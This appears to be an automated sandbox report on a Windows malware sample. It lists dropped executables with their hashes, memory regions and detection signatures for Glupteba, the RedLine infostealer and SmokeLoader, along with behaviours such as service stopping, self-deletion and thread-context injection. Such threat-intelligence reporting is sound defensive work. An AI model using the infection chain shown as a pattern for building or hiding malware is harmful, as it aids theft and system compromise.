SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

memory/2796-106-0x00000000026C0000-0x0000000002AB8000-memory.dmp

memory/3024-105-0x0000000000230000-0x0000000000231000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-FU4AD.tmp\_isetup\_isdecmp.dll

MD5 a813d18268affd4763dde940246dc7e5
SHA1 c7366e1fd925c17cc6068001bd38eaef5b42852f
SHA256 e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64
SHA512 b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4

\Users\Admin\AppData\Local\Temp\is-FU4AD.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\??\c:\users\admin\appdata\local\temp\is-8a7oe.tmp\tuc3.tmp

MD5 b0006be6d3eeeee1e448b578d3622baf
SHA1 9db597d2b477fab7bdb5c4d06a31461f270207f2
SHA256 6e411e1b4c94ce5730fbc6735ae105da5f99d606e2a816f9936caefc2d6f2b24
SHA512 bb396f46e562deefbe2e8938ec363e70bdbcfcc917e6aaea1aebff4b932ecf1acb4993b579d3e651a323fc80a4485a5a8457d6a757091f305e9003ba568855c4

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 252a44a5b707501d910ecaddaae97dea
SHA1 1c7e948c528713bca3d268f183ce2884864e16e0
SHA256 05e545736df8a13a8a18015330d5c2f98038fd9d4f22449afe24c943d2030fe3
SHA512 358062a073850a66b887397001bb1ef88a7d9bf21769764837a028298325c54e0c1cd9812cd2b1b90c23813da757337f46391dc07a1b7e367ec4f4501d3bb4c1

memory/2928-114-0x0000000074EA0000-0x000000007558E000-memory.dmp

memory/2928-113-0x0000000000390000-0x00000000003CC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FEEA.exe

MD5 dbcddd412342a03622d1b2b163708667
SHA1 33e958e343b8784b68029031b0e334ae781b4f4e
SHA256 c5d899f5889efd0a4c098b341198deb4c5cde4f2948776154e8d54c26af53e2a
SHA512 8872183973eb1d0cdbf134bee7f9c98cf6cb92672f85d5a3f7b7ba2c2e1d4c54fbd18d6186e6071243963e3b9fdd9f19a91f3d68fc3429d24cf83e84b5552eb0

C:\Users\Admin\AppData\Local\Temp\FEEA.exe

MD5 f2fc193c6ef77b9375d231cdb0f18e97
SHA1 f5a1718fa94dd5b2c8e87e565ed5535654ff2450
SHA256 5e6a482609c87559aff46965361a5f01040c7d073dcadf1c3650e70dece26d88
SHA512 2659f3477e0645c6523cf5a4b35be20d82bbe6e5ed62afb3d97e2f125580bc74e0ebb41bc4bcadd016c211f46a05640b94bb90254ba54af00053e6c58ae0d8a6

\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 d122e3b2b89eb6a7556953be54809af6
SHA1 cec8d0f094355d8e43563caf16aa4a83bdeea20e
SHA256 5dd7dd91a155a3d6b7ead98eeaf14d6af56fc7d91d05c6e1f02222e46852b3d4
SHA512 5d41f1b590ea9e689275ce3d49efc2addcbecfcac5862003133085be8f36fa4e1eb9f5706c444a31cde7223981bcb34dd85ec03597be04e06a36b6a6c268bfdc

memory/2796-116-0x00000000026C0000-0x0000000002AB8000-memory.dmp

memory/2796-117-0x0000000002AC0000-0x00000000033AB000-memory.dmp

memory/2928-115-0x0000000007180000-0x00000000071C0000-memory.dmp

memory/2796-118-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/2724-127-0x0000000000220000-0x0000000000229000-memory.dmp

memory/412-128-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2724-126-0x00000000008A2000-0x00000000008B5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 d4ad09094d0641969ebee18830efa370
SHA1 14dfc5edda6ad1613f851868523a36efec0809c6
SHA256 8543f1d8146053fb26d4f692ca7f82fc56a28d8a6f9e5904b8064ed383b302bf
SHA512 47118f1d2193bc6b96e97c6c39cb6b0ee409d51ee3a8e1c0d5e4570998dfeb5e0324561489629a8314c3c086c43712b61693d36f1d587ecfac44c1cf1dde15ed

memory/412-124-0x0000000000400000-0x0000000000409000-memory.dmp

memory/412-122-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 9c554b93921ec9d52ff9f0bda8b3b937
SHA1 c8a76e9c547e0590aadfa529c1c3bf3e89ab3bcb
SHA256 4f323ec9b994e6cf65d198bf9a77efe80000d8dd64a006992f0c0af8cd0e8e4e
SHA512 267455443b4086efa76e829d72860bdefaf919c39da63738c77a7f2871da7f559bf0bb31ef30ad912d1e59d5ad78745e968e6b6d652b8360f884cf46224a6dd5

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 8f1a56a5830905cbbde46bff6ab66588
SHA1 fecdeef425d60fe21f374bdd3405685245b64e4a
SHA256 a159d2e6172a0e1ca403d11575131cef6d1a956b9f7a34f3ebc4e98a056d59b3
SHA512 a0bf5b8e31514a53bbbe9fe5a6d9f6dfdfaefbdf2f7741c03968de632901ace81177430407253dce15ca0c1d6c7d33f52ad6a7d54724ca32ae81d31bdc46fa0c

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 fa21349afce08f321ed1b5378c404b1d
SHA1 d01d582e048c070430647830b335db54eaf470fc
SHA256 059acb7d0d2144ad29c3a668693fe9fb5cdf6501cd82d18a678650ced7824b41
SHA512 2ffdff2e3f45df2afbe42f505e2ee758239397f6584152e002229e60b3a44382a32f552121072a83d2962f694c5132b006a46e6028690602a9a1e99e9320c879

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 2b2936b9db9fc454d72b93bbaf0b31bd
SHA1 96dc7880bcc7e10b09cb85008a8f5b5e5253853b
SHA256 3b9eed47191dd56d628eec9070b2f989e0c1d69fc019108375c1db188b834f4c
SHA512 9340c2c2fdb8e2fa525caf0ebde801075026a44652fff4a94dc51312155d75b8b3633f6a193eb3cf452c802be5ef123ab527c248a701aa88ccaf74de1fa6891e

memory/2796-130-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/2796-131-0x0000000002AC0000-0x00000000033AB000-memory.dmp

memory/972-132-0x0000000002770000-0x0000000002B68000-memory.dmp

memory/972-134-0x0000000002B70000-0x000000000345B000-memory.dmp

memory/3004-135-0x0000000000400000-0x0000000000414000-memory.dmp

memory/972-136-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/972-133-0x0000000002770000-0x0000000002B68000-memory.dmp

memory/972-145-0x0000000000400000-0x0000000000D1C000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 22a4f967688fb53c163bc3da7a2a7573
SHA1 e8bb83df22e130c0d25dcd7c95e5598032c623e7
SHA256 532fe24c9f5cef2b0f1abab425366acb290ae01ee2ed27697352c21a6125cf9f
SHA512 c9a1491d66657efc314a02fd73798a6e5d25f24046930dea10383db2d3375e59dbb10efa3a7451f646ea4fe39d4783410374fe0cf01212db15ecae205ddb94ff

memory/972-146-0x0000000002770000-0x0000000002B68000-memory.dmp

\Windows\rss\csrss.exe

MD5 1c1e704cea0c6c4c04b9b8b0926335b7
SHA1 c1c8049ad80db29d24e99e7be18800e3cdd60aa3
SHA256 f86a6a7848dfea581044a9610195582a4f7f47b8e48824d8ee2e04701cdcde70
SHA512 d72ebf5e82beab15ddb05020a094c6a7b4b07224a7da0d0f2c1c43dcbad43c3e6ba1b284ed0e14a7b646f3998a0cfc963be841a24710cf26c124b16033092b27

\Windows\rss\csrss.exe

MD5 dc5939a344b5af0ed874e8b92fe62e18
SHA1 691b2b43712e1f67ca241d67f14f9705a9704427
SHA256 020bddf185d1f3d27bbf493e834d04a47eb0f3b167b0da84b37b0347087076d7
SHA512 cfec65ea455321dea7662d022d4b15f7f8f2b89d55cf542daf962eb6ad5784ef72118ad31559a65994f9016055d8393bd05c0b26a8821c2a3d1822326ae1f2b5

memory/1388-147-0x0000000003DB0000-0x0000000003DC6000-memory.dmp

memory/412-148-0x0000000000400000-0x0000000000409000-memory.dmp

memory/784-152-0x00000000026A0000-0x0000000002A98000-memory.dmp

memory/3024-153-0x0000000000230000-0x0000000000231000-memory.dmp

memory/2928-155-0x0000000074EA0000-0x000000007558E000-memory.dmp

memory/784-154-0x00000000026A0000-0x0000000002A98000-memory.dmp

memory/2928-158-0x0000000007180000-0x00000000071C0000-memory.dmp

memory/784-157-0x0000000000400000-0x0000000000D1C000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 531f22cd609e10d0cd70c02710301b1b
SHA1 619efdc574cc3ca59fc105f77006e33b16de9fad
SHA256 8c20a11107a8d017219f77436e43ea221de57c0dadbd696876f015f4027c7a59
SHA512 4b3ba4779d76baa6b17df8d3f0b99c1bbac62e4d651fbbe3da8b45dae2333fde94555c3e969cbfff65acc32833d1e2a3332f9aea1d21b1637668b93a8823ad00

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 9da6eef03d260d21db83a7466b06e23b
SHA1 6dc02699b091edea1d7857c449b067eb188fe9cf
SHA256 ea24982baedc8d7b233271da4197fd0a27ad86cfc367a15f79f9d758eb5f96f0
SHA512 9055001fc9da4d073af443887d6381445ab93e79f58913a6f94f96f494b5ff9aacb7811c934cf203aafc58bc48707de7b695b35d61f0d3d71048189de65e553b

memory/2900-170-0x0000000140000000-0x00000001405E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 bda3dfed5834c5fbc7763f80fccfbe86
SHA1 9c9ecb4ba8ef684c645b574357f35f82ef156b15
SHA256 21971883424f86f5b97311df325fa22d449acd8a3c26eb4bb6c0243d30cfc500
SHA512 d77d15b7fc29cea83e093d622712baf7f9a2c0c12b6053b3371ff95259592e610feddbe720ce42814ec62a02bfb5a5b8bc6a88b4e2290ce4275c33adef4831e8

memory/2900-178-0x0000000140000000-0x00000001405E8000-memory.dmp

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 6fc87d13123b53e65c010338b912fdee
SHA1 20c541f49fa2cb439db7bb4ff8e6a6c2d5d86b9e
SHA256 6f8ea268c0f6881ab7cfaaa7dd888441108cf5b80fcff18c9869eae61ed2af89
SHA512 016babe3be66a179c8ed7437e5ee36f955514af0e348d87df8fd33d5008c6412b99bd69845d38659fbff9a8ee7715e6ac6dde8727067220250d263a7e77c1b01

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 8c9faa17b915bdebd4c8bb8f0f77c6ec
SHA1 c76daa3387ca0628973ac37b56dba7c260432e63
SHA256 25c8755fd3c35cac8c7ac3c87fbe33a010f960c7d12e47b1db046d359181228a
SHA512 469529de30c6fe908476a5845a60e03492f9a0390c33127d5e871182b1c635928493ffc1565def8cccc8b140a0dea32f63e88e080311f92a42be6159d4c075be

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 cbf898fc0c12e5e3968fc9c4267e668f
SHA1 c4d1de3bd327243298a971b3da35c971a55fdbc0
SHA256 422f7eda3ff7a9da3b5bb3e461683a82ffa0127fa911804b14f167c5333b1fa4
SHA512 d3e2b7e2b6950b50da69ff8db49c14ba9eab35067927f9711b3cc2d27e399c2dfadc6a5fc1c803631d3bf6d5b5c414286344fdd4c63df917baba0cd94a010f89

\Users\Admin\AppData\Local\Temp\symsrv.dll

MD5 c978d08ac1923bab079ae6110c62bd7f
SHA1 b6e4fd3e020c85fec2f3992a131bed44232041ba
SHA256 cccad339d4a1feff2cf148d0450ea2a2142cf2676e4f003f36b1aa9e98955ba7
SHA512 bfb7423594dd3837af4c519c6f3109333b4d4511768444b56870d97becf77e318826cf2889688f18c469bd56859bf163e7000f4c02ff2885adf2289ba2f5e4b7

\Users\Admin\AppData\Local\Temp\dbghelp.dll

MD5 d548a8b80f2883cf65dd5a01ce22e126
SHA1 a79880cc784cafecfe6d239a3b3e4243144de81c
SHA256 e2a560508f018f67da107174f5d9819a12cfb2600bade9a6df354a59044bff28
SHA512 1c9ddcd7c44beee96274e274935db0f853359b47f56320c44b9c1a495b90d8b5d4ea6091d89257863b94eada6d3c9323d5445d1ec557b09d67158d546b765871

\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 c46f53bf9cd28f9aeabc8e4a6aace6e6
SHA1 fe4165a2624e10cdd17e0d05f218ef3f72075ed0
SHA256 8bfb043a24015a94db47edf61f035482610783af4520b39337eebb3ae6a80694
SHA512 1ef45307d70ba1255f654995cce4fb994f394cc1299b3ffc472232b4274e7875ce66b3d1f2061cb248105534e35d1ccd833e9da7a6a81d44637988de169ef032

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 ad343a58da929811577f052a2aa152fc
SHA1 56a65433a2b6b6eb1c9c63c4392a67cebf90b8cc
SHA256 87b016241605b01899be2c96d3dbccaf38ac3ada1e067275cb94cd43c23fa531
SHA512 83d5b6450bf85dd24f2f5e41478ceb6f0daa76f0afef446eae79f34e7e06b939d4cee8d303bd28d752af08a4cae3dddb00fd293841447966f18f5f985028f2d3

\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 0ff312913384822d7b060ef1951e4400
SHA1 b9026f38c0989f2376eaab26d85ee38d5e4583b2
SHA256 3cc40c9008d75524912690bd620bd841dbbd420f0e67babf2c8691ce09a21a48
SHA512 e7d58958614b7656fd5aeaed8695c37328531d0c30358cb1e3d8bb4def3d7023d158341fd337e903464f34816844646678a3737a545dbf2e0ce74386304abdf3

memory/3024-198-0x0000000000400000-0x0000000000965000-memory.dmp

memory/1784-200-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/3008-199-0x000000013F320000-0x000000013F8C1000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 d71dff97ca86ca16c3db8bdb5285fb35
SHA1 271c01246897497d069b81ed37af296cf6c1e498
SHA256 4a19255504acfbd49c4e1aed722c7e62b50b5742b860eedabc5f46160f8aefac
SHA512 1fed2a183296b563e35d803927e539d28169895f6ca5b522a1c714f222a2d3e578b1e167b19568b5ad4800b898f7ac041c7bd8f6bb02d1361b32cbdcfb0f682a

C:\Users\Admin\AppData\Local\Temp\Tar31A0.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

memory/784-241-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/784-246-0x00000000026A0000-0x0000000002A98000-memory.dmp

memory/784-250-0x0000000000400000-0x0000000000D1C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5FFE.bat

MD5 55cc761bf3429324e5a0095cab002113
SHA1 2cc1ef4542a4e92d4158ab3978425d517fafd16d
SHA256 d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a
SHA512 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155

memory/1224-278-0x0000000001DB0000-0x0000000001DB8000-memory.dmp

memory/1224-277-0x000000001B3D0000-0x000000001B6B2000-memory.dmp

memory/1224-280-0x0000000002980000-0x0000000002A00000-memory.dmp

memory/1224-282-0x0000000002984000-0x0000000002987000-memory.dmp

memory/1224-285-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TC60ZO5QB7DZZBDANICX.temp

MD5 4b42a5243f1820b1e530c2ae736a8cb4
SHA1 36653189ba3a1e24ad5449c118f810dd7a3b3e4b
SHA256 d34a113b1f03880b5a17fa92a39ecb506f5fb68ffbe8fc4c8da5af636d4758f8
SHA512 05f77e564ca6b8239920bdb02bdcf02b52dd409a61f1ff2d2e61b48d9e8817468601953af72f7e9d05607da9e892d394669b061de4999b7c4f1fb6f85b6c8eb2

memory/2244-293-0x000007FEF5560000-0x000007FEF5EFD000-memory.dmp

memory/3008-303-0x000000013F320000-0x000000013F8C1000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 e966740f5ba6a3679f1dafd7ef109658
SHA1 70a67b854793462ea66d80fd95c94be9ee4d3624
SHA256 25997cf8c231c2a6f42d77f5c27d5a8b58775fa200ee5d15b910c0c07028a95f
SHA512 667e0bfc95af4fad81ca65c52c7cee1019e1d27a9ea2f4c9a904644f9da99e2ca673a4a3d165e509d1cbb64107d8a52e171b3423405f65229506bed17dd73fa0

memory/2244-300-0x000007FEF5560000-0x000007FEF5EFD000-memory.dmp

memory/2244-299-0x0000000002A90000-0x0000000002B10000-memory.dmp

memory/2244-298-0x0000000002A90000-0x0000000002B10000-memory.dmp

memory/2244-297-0x0000000002A90000-0x0000000002B10000-memory.dmp

memory/2244-296-0x000007FEF5560000-0x000007FEF5EFD000-memory.dmp

memory/2244-295-0x0000000002820000-0x0000000002828000-memory.dmp

memory/2244-294-0x0000000002A90000-0x0000000002B10000-memory.dmp

memory/2244-292-0x000000001B5A0000-0x000000001B882000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 30c8b181846a06b0c8827ff5019bcf64
SHA1 810b3307e8bbe30ef8d1f915fbdf0d387acfe3d1
SHA256 03af3947f2e318e664c776e6a12232d536ab9e5df3dd6ed242b412bf7ce505e3
SHA512 dcdeef6cd7d5c57abe4f5ad0fdb0adb34ea32b09c1f887550a70d05eb48718cc270b42c08884df0393fae38189fa57b253f5887c86fb7374d817cbad803fdd54

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 5da20b844c34cda2b83a71b13db09cc4
SHA1 69e6d745c078011b171356b1257806a6e6bd1cfe
SHA256 6556af10ea7818bee690b6e39844a2ddc3a42bff4cf27434584de666ef7e459b
SHA512 f2686a91185d8500ee47df031a996e8143d3fd994283c9792e5992870e5cf67003dafdfd74694ac9f358b1e843fc93d34a559c6ba226ac4744f628f3115b4415

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 293e59cd9eb8aa3a3f1d7af37e83d4d8
SHA1 0c334cf435a195e9377670c6178ea42699e92a23
SHA256 2e0121034d468361d66406c7328386e8d415d8292c81a40ff630e09e9a58bb3a
SHA512 0b05ad68666ca7cb77638a42ff32f4b5ad9fd801346573c4febb1d1c4bcca18d067f7c593f433eb5e579d97d7d89d3b36dce68dafecc6e6e5870870099dc9999

memory/1224-284-0x000000000298B000-0x00000000029F2000-memory.dmp

memory/1224-283-0x0000000002980000-0x0000000002A00000-memory.dmp

memory/1224-281-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp

memory/1224-279-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp

memory/784-349-0x0000000000400000-0x0000000000D1C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\88AD.exe

MD5 c2f14d3e4cf4ad8cd024528f948651d0
SHA1 30d7c66ef087c3740f5960008ab44200d85afb23
SHA256 21c96a6163eeafc0fdc2dd0c8e3a27887c5ef76cf684ebff4a9240af91267136
SHA512 6b8aff9790eee6ad59749fca035933f5845828ee7fb897e865f0817272bad8a1c81cad8f0ddd3fe5fa85c2eb7ea190a38e4af506e4903f60c6d6af3088a879f7

memory/556-355-0x00000000758D0000-0x00000000759E0000-memory.dmp

memory/556-359-0x00000000758D0000-0x00000000759E0000-memory.dmp

memory/556-362-0x00000000758D0000-0x00000000759E0000-memory.dmp

memory/556-366-0x00000000758D0000-0x00000000759E0000-memory.dmp

memory/556-367-0x00000000758D0000-0x00000000759E0000-memory.dmp

memory/556-365-0x00000000758D0000-0x00000000759E0000-memory.dmp

memory/556-364-0x0000000000BB0000-0x000000000167A000-memory.dmp

memory/556-363-0x00000000758D0000-0x00000000759E0000-memory.dmp

memory/556-361-0x00000000758D0000-0x00000000759E0000-memory.dmp

memory/556-356-0x00000000758D0000-0x00000000759E0000-memory.dmp

memory/556-354-0x0000000000BB0000-0x000000000167A000-memory.dmp

memory/1980-383-0x000000013FF70000-0x0000000140511000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\A801.exe

MD5 14e3340de2479096b23458b6a8c3eccf
SHA1 eba2c5cb9303afe8a9f84157998a57dd5b4fc774
SHA256 84ba963c2c7d2c335b5c53c844596a648936923e12c1ea4df9886206ca4107c5
SHA512 9152863446c4a8ca54307e7d9bb471974b11f2b76fdb104b2f199fea7f598b66c4ceef1283645747e1b838b8637be94e9deb32c7bf1dfe794699ab2c995fb3a4

C:\Users\Admin\AppData\Local\Temp\A801.exe

MD5 f8ae893e93340b3df2ee3120d9169c3d
SHA1 623d457b6d1197ebb75a2e192b4567b2c0784701
SHA256 e5653e3aed1181119b27ae4886fef78d074853fd269e518dd5d6c3bea7c269c6
SHA512 3b0f9c5cfa8ca2c56af371b8e18627998af90e487957f9a1dee1b7684de96622917dc324382f263e3b9b132c9400b7483e2eb17a226ab513a829560cc18a075e

memory/2440-390-0x00000000002C0000-0x0000000000351000-memory.dmp

memory/2148-394-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\A801.exe

MD5 fe0706bc5800288c2eed152bc9577627
SHA1 62a79e527f962a4dcd5681632d8f0107f967a82f
SHA256 5967c0bcd29f1089a118ef1706226a2d03800b4e23b50dfed127744d91cb877b
SHA512 b69e82785e7696e105b6e76d3392d1fd4db4a0d752f3d57bcd6f860ae2c4be67cd76a1b2c6bb81e97956d93306829e04517be2361541d804ace421222d56799d

memory/2148-401-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2148-397-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\A801.exe

MD5 acce4608ad8dc168b91b8d04fe6d1863
SHA1 2999c35b5acc85ce1ba29d04cde3055a9f49c9f2
SHA256 a601607df480ae53808520cb77de552a07aa43e1d897ed02328207a34699a07a
SHA512 1383b506e08949b10f4cbfcba8fe3dbc8bdee3f0ad91ca3c20a61e9bcb1cb6b94e3d04b382361df41058314c90b49eedc34c1c762e1e2c6cd7543dd90c50d86e

\Users\Admin\AppData\Local\Temp\A801.exe

MD5 ea13287dc6bf516d1c69b8cecb8e4fa3
SHA1 9194ab3f12de4e1d54ff123620664858154c7a8a
SHA256 6fde81e18510dbeb8c0a732c72035cbe0e354885e26f0110fddcb4aedeb8cfba
SHA512 292c94af7dd2da21720ee446bd0ccd6672308e1ddec969db38d4ed3ade02da3e8091bdbb3139b5bb8f851571960afe58175ada7c64a0407de7c833f90c69bfa3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c57c7dcc7ccba03b7120bd1a9c7a360a
SHA1 1131db2ac014fef498773fed63d483b8c8b919b1
SHA256 3b3bae70509ee6c52edf4fac6c0ec4ec1b3282fb289f62b2b10115b4d9a43f84
SHA512 aefdc636a7cb50e434a009849635932bb804c42dbe6c38408e4ada5db1b65e37d08ca3d38098c8285555b1f0d5757990d70832bcc17a8c157477b0a723a2619f

C:\Users\Admin\AppData\Local\0dc616c6-eb31-4468-86e7-ba6f386b92f4\A801.exe

MD5 d1307a1519b33d366ddbb44c00b17823
SHA1 9172c376d10d5efbb8a71c25c3bf5b6ef5e25941
SHA256 796fa0ca11c954b5ef1e48f9f3ee531f8f2547d6f57d69f5eb4a69d55700a2eb
SHA512 1f8d866a8b5ae27e7384c836523c8d95bdf1161af912f638a2a4bc3838360894dfb2a762860e6bafe57926d65fe82f0e6c4809875e34869faf146fc3815444d1

memory/2148-422-0x0000000000400000-0x0000000000537000-memory.dmp

\Users\Admin\AppData\Local\Temp\A801.exe

MD5 cb9c0e031b66ebc72cf5f0ae427d7be8
SHA1 addc6823db0e1a2dadd1bc55964b9796a8bbeabe
SHA256 57d980514ed74841448161cb3e8a8ac232e6b480c562f2d0c0a0370121ceaa14
SHA512 8d76740411f73184082d048f5a4be285647f321b2ff6bfba7cd0c859de26a5907156a25d00e4b38f5e2e8a225890de7abf78c10db7913df8d0629d395bf48ae4

memory/2332-424-0x0000000000220000-0x00000000002B1000-memory.dmp

memory/784-430-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/2288-446-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2288-445-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2288-465-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2288-468-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2288-467-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 05de097ef8b1e444f23f1a1af553f00b
SHA1 cb1840aec95386161e9ae83d8652f9d2f700cfa0
SHA256 6f898080d2a482dd8b5fb5062576c6d5ef3d9b0ebdb38de5c5ec53b5f6dcd1b1
SHA512 6c41ad83c8c6707517d29c51ac4b65516e394032fe2f360ba5a556cb963c9307c1b5461ce24085afeafd34b5291cd9ff27ce02b6f9854d8516231ba5d6fc06b0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 78430c931df9506c16d1f104d45146a1
SHA1 fc9cc77803483da463cb6a749d0a736d6202730c
SHA256 8d6d153555d4c9e551c058dd2ec0ea62dc109bf1105aaee441122f8aadeaf90c
SHA512 0b1fc97e0c579be126ccc9dc84d147623b55ad1cfa8004405c42a9e1fd49f45f3cac0d1bf9e13dca94d75980a8c1d404a3aed651bdc180feb9b2c57913de8811

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 15eb6a0a73d63add20b76f716f66b924
SHA1 765ce3d5271c1d924df404c075218a279d8bae8d
SHA256 a00dbef09e2a13c959199d60094c04197b98a20247872d0d1934cb757d2d3d09
SHA512 6864e70d14ba6e87d8eacf7a4a0e130dfa1e9370aba44a1ce1d69dabe2ed083a1925f5bf8192e98d142d9c279429d678e36fe6af186276931e536bfaa648815d

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-11 10:55

Reported

2023-12-11 10:57

Platform

win10v2004-20231127-en

Max time kernel

121s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3635043082-2972811465-3176142135-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\9438.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4632 set thread context of 3356 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\xrecode3\bin\x86\is-JR7S3.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-UHCH4.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
